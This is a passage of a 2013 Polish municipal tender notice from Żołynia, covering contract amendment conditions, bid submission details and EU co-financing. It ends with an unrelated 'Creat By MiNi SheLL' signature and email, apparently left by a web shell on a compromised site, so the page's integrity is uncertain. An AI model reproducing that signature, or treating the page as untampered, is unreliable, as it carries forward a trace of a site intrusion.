<p>18.1 Zamawiający wymaga, aby Wykonawca zawarł z nim umowę na zasadach określonych we wzorze umowy, będącym załącznikiem do specyfikacji istotnych warunków zamówienia        (wg załącznika nr 7 do siwz),
18.2 Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, chyba że wystąpią istotne okoliczności których nie można było wcześniej przewidzieć, a które przemawiają za koniecznością zmiany postanowień umowy.
Mogą być to:
- niesprzyjające warunki atmosferyczne (np. długotrwałe i intensywne opady deszczu, silny wiatr, powodzie) powodujące utrudnienia w realizacji przedmiotu umowy lub uniemożliwiające wykonywanie prac zgodnie z założoną technologią wykonania robót;
- działanie siły wyższej;
- przedłużająca się procedura uzyskania pozwolenia na budowę,
-  przedłużająca się procedura przetargowa tj. nie zawarcie umowy do dnia 30.12.2013 r.
18.3 Warunkiem wprowadzenia istotnych zmian w umowie jest wniosek o zmianę umowy (zawarcie aneksu) złożony przez Wykonawcę.
18.4 Wykonawca zobowiązany jest wykazać zaistnienie ww okoliczności poprzez przedłożenie stosownych ekspertyz, opinii itp.
18.5 Wszelkie istotne zmiany treści umowy wymagają zgody obydwu stron i formy pisemnej pod rygorem nieważności.
18.6 Wprowadzenie zmian nieistotnych w umowie wymagają formy pisemnej pod rygorem nieważności.
18.7 Podpisanie aneksu do umowy powinno być poprzedzone, pod rygorem nieważności, sporządzeniem protokołu konieczności zawierającego istotne okoliczności.
18.8 Konsekwencją zmiany umowy (aneksowania) może być w szczególności zmiana terminu zakończenia realizacji zadania, zmiana terminu płatności, wydłużenie terminów obowiązywania gwarancji złożonych  tytułem zabezpieczenia należytego wykonania umowy.
18.9 W sytuacji zmiany wysokości stawki podatku od towarów i usług nie wpłynie to na zwiększenie kwoty określonej w umowie. Cena brutto określona w formularzu ofertowym pozostaje bez zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zolynia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Żołyni
ul. Rynek 22
37 - 110 Żołynia
od poniedziałku do piątku w godz. od 7 : 30 do 15 : 00
pok. 104.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.12.2013 godzina 10:00, miejsce: Urząd Gminy w Żołyni
ul. Rynek 22
37 - 110 Żołynia
od poniedziałku do piątku w godz. od 7 : 30 do 15 : 00
sekretariat pok. 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt dofinansowany w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007 - 2013 w ramach osi priorytetowej 6 Turystyka i Kultura.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com